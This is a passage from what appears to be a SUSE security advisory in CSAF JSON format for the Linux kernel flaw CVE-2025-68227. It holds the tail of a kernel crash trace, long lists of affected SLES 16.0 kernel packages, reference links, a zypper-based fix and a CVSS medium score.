linked in:\n...\n\nPKRU: 55555554\nCall Trace:\n\u003cTASK\u003e\ndo_accept (net/socket.c:1989)\n__sys_accept4 (net/socket.c:2028 net/socket.c:2057)\n__x64_sys_accept (net/socket.c:2067)\nx64_sys_call (arch/x86/entry/syscall_64.c:41)\ndo_syscall_64 (arch/x86/entry/syscall_64.c:63 arch/x86/entry/syscall_64.c:94)\nentry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:130)\nRIP: 0033:0x7f87ac92b83d\n\n---[ end trace 0000000000000000 ]---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68227",
"url": "https://www.suse.com/security/cve/CVE-2025-68227"
},
{
"category": "external",
"summary": "SUSE Bug 1255216 for CVE-2025-68227",
"url": "https://bugzilla.suse.com/1255216"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
